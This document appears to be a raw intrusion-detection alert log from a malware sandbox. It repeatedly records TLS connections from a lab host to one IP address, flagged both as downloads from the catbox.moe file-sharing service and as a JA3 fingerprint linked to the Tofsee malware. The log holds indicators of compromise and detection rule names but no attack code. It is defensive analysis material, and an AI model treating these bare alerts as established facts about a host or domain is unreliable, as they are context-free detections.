TCP 192.168.56.101:49526 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49507 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49486 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49311 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49520 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49507 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49311 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49488 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49488 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49521 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49512 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49521 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49316 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49488 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49512 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49316 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49521 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49512 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49316 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49316 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49489 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49489 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49516 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49489 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49516 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49322 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49322 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49516 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49322 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49492 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49492 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49518 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49492 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49518 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49342 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49492 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49342 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49518 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49342 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49518 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49514 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49514 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49514 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49347 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49523 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49347 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49523 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49347 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49523 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49524 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49524 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49524 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49357 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49357 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49524 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49357 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49362 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49362 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49362 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49368 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49368 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49368 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49370 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49370 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49370 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49378 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49378 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49378 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49380 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49380 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49380 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49381 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49381 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49381 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49380 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49389 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49389 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49389 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49404 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49404 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49404 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49407 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49407 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49407 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49408 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49408 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49408 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49409 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49409 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49409 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49408 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49417 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49417 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49417 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49420 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49420 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49420 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49434 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49434 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49434 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49435 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49435 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49435 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49435 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49442 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49442 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49442 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49446 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49446 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49446 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49446 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49453 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49453 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49453 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49453 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49458 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49458 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49458 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49469 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49469 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49469 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49493 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49493 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49493 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49496 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49496 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49496 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49501 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49501 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49501 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49502 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49502 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49502 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49525 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49525 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49525 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49494 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49346 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49277 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49499 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49360 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49217 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49275 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49433 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49247 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49262 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49375 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49448 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49437 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49386 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49500 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49392 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49513 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49364 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49205 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49355 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49235 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49307 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49336 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49522 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49356 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49257 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49444 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49248 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49255 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49474 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49483 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49421 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49395 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49377 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49461 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49449 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49226 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49385 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49308 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49452 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49526 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49259 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49227 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49287 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49486 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49426 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49231 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49335 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49331 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49423 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49367 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49200 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
